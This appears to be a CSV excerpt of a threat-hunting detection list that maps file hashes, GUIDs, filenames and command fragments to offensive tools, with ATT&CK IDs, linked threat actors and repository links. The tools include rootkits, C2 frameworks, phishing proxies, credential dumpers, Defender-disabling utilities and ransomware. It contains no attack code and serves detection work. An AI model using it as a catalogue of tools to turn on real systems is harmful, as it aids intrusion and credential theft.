"*CatalogFile=Nidhogg.cat*",".{0,1000}CatalogFile\=Nidhogg\.cat.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","37622"
"*catchetumbotifyoucan>*",".{0,1000}catchetumbotifyoucan\>.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","37623"
"*catphish.rb*",".{0,1000}catphish\.rb.{0,1000}","offensive_tool_keyword","catphish","Generate similar-looking domains for phishing attacks. Check expired domains and their categorized domain status to evade proxy categorization. Whitelisted domains are perfect for your C2 servers. Perfect for Red Team engagements.","T1565 - T1566 - T1567 - T1596","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/ring0lab/catphish","1","1","N/A","N/A","N/A","7","612","118","2018-10-16T12:57:25Z","2016-10-24T22:48:51Z","37624"
"*catspin.sh http*",".{0,1000}catspin\.sh\shttp.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37625"
"*catspin.sh -info*",".{0,1000}catspin\.sh\s\-info.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37626"
"*catspin.sh -kill*",".{0,1000}catspin\.sh\s\-kill.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37627"
"*catspin.sh -run *",".{0,1000}catspin\.sh\s\-run\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37628"
"*catspin_for_readme.mp4*",".{0,1000}catspin_for_readme\.mp4.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37629"
"*catspin_poc.mp4*",".{0,1000}catspin_poc\.mp4.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37630"
"*catspin_poc_final.mp4*",".{0,1000}catspin_poc_final\.mp4.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37631"
"*CB 4D 85 D2 74 10 41 8A 00 4D 03 C3 88 02 49 03 D3 4D 2B D3*",".{0,1000}CB\s4D\s85\sD2\s74\s10\s41\s8A\s00\s4D\s03\sC3\s88\s02\s49\s03\sD3\s4D\s2B\sD3.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","#content","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","37632"
"*cb0a620a960506193df32016f825248dec7fe504d8b857ee54a88ad1bdf8d9ce*",".{0,1000}cb0a620a960506193df32016f825248dec7fe504d8b857ee54a88ad1bdf8d9ce.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","37634"
"*cb0b0fa30345d487f99dce16cb07ef0094938dbf7eedfe48e2a0ad7f2973a7bb*",".{0,1000}cb0b0fa30345d487f99dce16cb07ef0094938dbf7eedfe48e2a0ad7f2973a7bb.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#filehash","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","37635"
"*cb0bacc6cda2b791aca69d7ac01f3e43ab2d747e037b1ca0d5779b58b5a72798*",".{0,1000}cb0bacc6cda2b791aca69d7ac01f3e43ab2d747e037b1ca0d5779b58b5a72798.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37636"
"*cb0bdce759cc157371559d3a570630af5bc64c050a7cc79ef95062d3d0db987e*",".{0,1000}cb0bdce759cc157371559d3a570630af5bc64c050a7cc79ef95062d3d0db987e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37637"
"*cb10930997bcc3b5667fea0bf825208cfd87f96f6990082e81cd31123a8b01b7*",".{0,1000}cb10930997bcc3b5667fea0bf825208cfd87f96f6990082e81cd31123a8b01b7.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","37638"
"*cb10b5bb6fd0d22f1388cd1864af49f224b7caec1cb56145b225b6035da73428*",".{0,1000}cb10b5bb6fd0d22f1388cd1864af49f224b7caec1cb56145b225b6035da73428.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37639"
"*cb12cf3f7f44250c5a2142d506921aa3c2ae8a1c6ef2f3781b3bf2ae7eb6cad4*",".{0,1000}cb12cf3f7f44250c5a2142d506921aa3c2ae8a1c6ef2f3781b3bf2ae7eb6cad4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37640"
"*cb1995529b5d234699ede8dd41de77848b2ab6ffb43e3c150aba987f44a38779*",".{0,1000}cb1995529b5d234699ede8dd41de77848b2ab6ffb43e3c150aba987f44a38779.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37642"
"*cb1c1dec2980acb674da9b9cb077fda38cfc035a600f65c6fdc84cb8636eddb0*",".{0,1000}cb1c1dec2980acb674da9b9cb077fda38cfc035a600f65c6fdc84cb8636eddb0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37643"
"*cb21ae1cd69be5a97dd4b3e67779100a58f86761ecd83624e5645945a8df0c59*",".{0,1000}cb21ae1cd69be5a97dd4b3e67779100a58f86761ecd83624e5645945a8df0c59.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","37644"
"*cb21e55fb1b580820aaf8090eae7e49cd59360e91456ab85a74828107e1dedde*",".{0,1000}cb21e55fb1b580820aaf8090eae7e49cd59360e91456ab85a74828107e1dedde.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37645"
"*cb287d756b38831a47d5cd86e5b332be4997d89fa275de5a99883ec151b4bbdc*",".{0,1000}cb287d756b38831a47d5cd86e5b332be4997d89fa275de5a99883ec151b4bbdc.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","37646"
"*cb291da763f1ac7b8221be536e9d110a4c937c749da51b15151975c1b84f8b6d*",".{0,1000}cb291da763f1ac7b8221be536e9d110a4c937c749da51b15151975c1b84f8b6d.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","#filehash","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","37647"
"*cb2ca98c55b3128b2ba07b17243f67fb68ccba99a6d4476480cdf80741b2eda0*",".{0,1000}cb2ca98c55b3128b2ba07b17243f67fb68ccba99a6d4476480cdf80741b2eda0.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37648"
"*cb3754f82aa212d4875c36e00ee5cdbb84f35250b08f019f8b30a2027e00a0bf*",".{0,1000}cb3754f82aa212d4875c36e00ee5cdbb84f35250b08f019f8b30a2027e00a0bf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37651"
"*cb3d6fffb558efda2aca145d63aac6e1501dee7be14f8d2e9a3d3f3c369fc6e2*",".{0,1000}cb3d6fffb558efda2aca145d63aac6e1501dee7be14f8d2e9a3d3f3c369fc6e2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37652"
"*cb4272e5aeafc2ee72b02f1f80818ff10214156ed4b8a4ecf12730b13e9a6fd9*",".{0,1000}cb4272e5aeafc2ee72b02f1f80818ff10214156ed4b8a4ecf12730b13e9a6fd9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37653"
"*cb4406bc759bd471ac86d80678abd6dcec4934d8db7d92123ebd5960330699cf*",".{0,1000}cb4406bc759bd471ac86d80678abd6dcec4934d8db7d92123ebd5960330699cf.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","0","#filehash","N/A","10","","N/A","","","","37654"
"*cb4490df575c59cc338804d8401be9782981fa7a5e9785a03781a3c135a8d837*",".{0,1000}cb4490df575c59cc338804d8401be9782981fa7a5e9785a03781a3c135a8d837.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","37655"
"*cb4591d160b6943c4af0374fa661a3f754682cc92c92f5b2382ac006ad8dad3b*",".{0,1000}cb4591d160b6943c4af0374fa661a3f754682cc92c92f5b2382ac006ad8dad3b.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","37656"
"*cb492d017e08e8eaed726559fe3ce8b499ec838392b9e669c6d781b50ee8e7a9*",".{0,1000}cb492d017e08e8eaed726559fe3ce8b499ec838392b9e669c6d781b50ee8e7a9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37657"
"*cb4a4a24fdd61493e58d83befacd93981771c5e8e7ff206b1c6050134613ae4a*",".{0,1000}cb4a4a24fdd61493e58d83befacd93981771c5e8e7ff206b1c6050134613ae4a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","37658"
"*cb4af671a007c51441f62673948dda869f7e746f791e2ff776de9a17ff900e65*",".{0,1000}cb4af671a007c51441f62673948dda869f7e746f791e2ff776de9a17ff900e65.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37659"
"*CB561720-0175-49D9-A114-FE3489C53661*",".{0,1000}CB561720\-0175\-49D9\-A114\-FE3489C53661.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","#GUIDproject","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","37662"
"*cb5a07900a7a01a7619e3391c0a2b59f81a8d8784c66698bb02263faef9311a1*",".{0,1000}cb5a07900a7a01a7619e3391c0a2b59f81a8d8784c66698bb02263faef9311a1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","37664"
"*cb5f87dbd2f764382e033f11807f823c72532878966ad60b479e523a3aef30cd*",".{0,1000}cb5f87dbd2f764382e033f11807f823c72532878966ad60b479e523a3aef30cd.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","37667"
"*cb6759a0fccc69211687c11da0831532c127e7657eb74bc9ee3c86ad08097935*",".{0,1000}cb6759a0fccc69211687c11da0831532c127e7657eb74bc9ee3c86ad08097935.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","37668"
"*cb67da2517b03494285a38806be0aefd25443a3c098227f23023b48d4fa575da*",".{0,1000}cb67da2517b03494285a38806be0aefd25443a3c098227f23023b48d4fa575da.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","37669"
"*cb7521ed61b825e46af63d8e3d82ba30540be70145b1a24e2cdec82be9256922*",".{0,1000}cb7521ed61b825e46af63d8e3d82ba30540be70145b1a24e2cdec82be9256922.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","37671"
"*cb7615b1cee96548eeaaa7a8319f6a64310052e7f6bdc54529dd7f4b8c0c2845*",".{0,1000}cb7615b1cee96548eeaaa7a8319f6a64310052e7f6bdc54529dd7f4b8c0c2845.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37672"
"*CB790E12-603E-4C7C-9DC1-14A50819AF8C*",".{0,1000}CB790E12\-603E\-4C7C\-9DC1\-14A50819AF8C.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#GUIDproject","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","37673"
"*cb825b66b73ae775bd034e0ff8506e2008e54c57862155446aba6552dd484017*",".{0,1000}cb825b66b73ae775bd034e0ff8506e2008e54c57862155446aba6552dd484017.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37675"
"*cb8f501c3b38552612b6303dfec0479df31b9c79a5fbec5462614f9a1d7eba67*",".{0,1000}cb8f501c3b38552612b6303dfec0479df31b9c79a5fbec5462614f9a1d7eba67.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","37676"
"*cb93e410d0d8660c4aef3b7f98c08408d3ca972b898705d681d9a569b61c703b*",".{0,1000}cb93e410d0d8660c4aef3b7f98c08408d3ca972b898705d681d9a569b61c703b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37678"
"*cb9447135d98011ed452d9b69d6b88f732ce08e2481b1c2f78b4bdd36d090bb2*",".{0,1000}cb9447135d98011ed452d9b69d6b88f732ce08e2481b1c2f78b4bdd36d090bb2.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37679"
"*cba64638575e382bab065f43dc60b76943bce77854a80af38debeb803edb96e4*",".{0,1000}cba64638575e382bab065f43dc60b76943bce77854a80af38debeb803edb96e4.{0,1000}","offensive_tool_keyword","VNCPassView","recover the passwords stored by the VNC tool","T1003 - T1555 - T1081","TA0006 - TA0007","N/A","GoGoogle - 8BASE","Credential Access","https://www.nirsoft.net/utils/vnc_password.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37682"
"*cba7954a3a44198ede1f02ab8b4ce571d089b72b1dab61bd5cf004958a5e1172*",".{0,1000}cba7954a3a44198ede1f02ab8b4ce571d089b72b1dab61bd5cf004958a5e1172.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","0","#filehash","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","37684"
"*cba965f520de118009142c8dc4076be542d53e4985fe55f69acf8651a3a4067a*",".{0,1000}cba965f520de118009142c8dc4076be542d53e4985fe55f69acf8651a3a4067a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37685"
